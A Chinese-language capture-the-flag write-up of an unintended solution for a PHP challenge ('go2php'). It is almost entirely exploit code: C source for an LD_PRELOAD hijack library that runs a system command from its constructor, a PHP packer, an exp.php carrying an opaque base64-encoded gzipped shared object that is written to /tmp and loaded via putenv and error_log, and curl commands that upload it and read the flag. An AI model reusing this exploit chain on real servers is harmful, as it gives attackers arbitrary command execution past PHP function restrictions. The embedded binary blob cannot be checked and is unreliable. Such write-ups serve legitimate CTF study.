非预期
没ban putenv,可以利用ld_preload劫持,同时对于利用的.so文件也不需要拥有可执行权限,可读即可。(phar可以保留执行权限)
// evil.c // gcc -shared -fPIC evil.c -o evil.so #define _GNU_SOURCE #include <stdlib.h> #include <unistd.h> #include <sys/types.h> static void init() __attribute__((constructor)); static void init() { unsetenv("LD_PRELOAD"); system("/catflag > /var/www/html/flag.txt"); }
gzip打包+base64编码
<?php /** * 读取文件 -> gzip压缩 -> base64编码 */ // 配置 $input_file = 'evil.so'; // 要处理的文件 $output_file = 'evil.so.b64'; // 输出的base64文件(可选) // 读取文件 if (!file_exists($input_file)) { die("[-] File not found: $input_file\n"); } $data = file_get_contents($input_file); // gzip压缩 $compressed = gzencode($data, 9); // 9是最高压缩级别 // base64编码 $encoded = base64_encode($compressed); if ($output_file) { file_put_contents($output_file, $encoded); echo "\n[+] Saved to: $output_file\n"; } ?>
exp.php如下
<?php $encoded = "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"; $compressed = base64_decode($encoded); $data = gzdecode($compressed); file_put_contents('/tmp/evil.so', $data); putenv("LD_PRELOAD=/tmp/evil.so"); error_log("trigger", 1); ?>
➜ go2php curl -X POST -F "file=@exp.php" http://127.0.0.1:6666/index.php upload success: File uploaded to /home/ctf/c8719b1718b69e4a9d0c3b9b3052bf98.php% ➜ go2php curl -X POST -F "file=@exp.php" http://127.0.0.1:6666/flag.txt QWBQWB{th1s_1s_a_test_f1ag}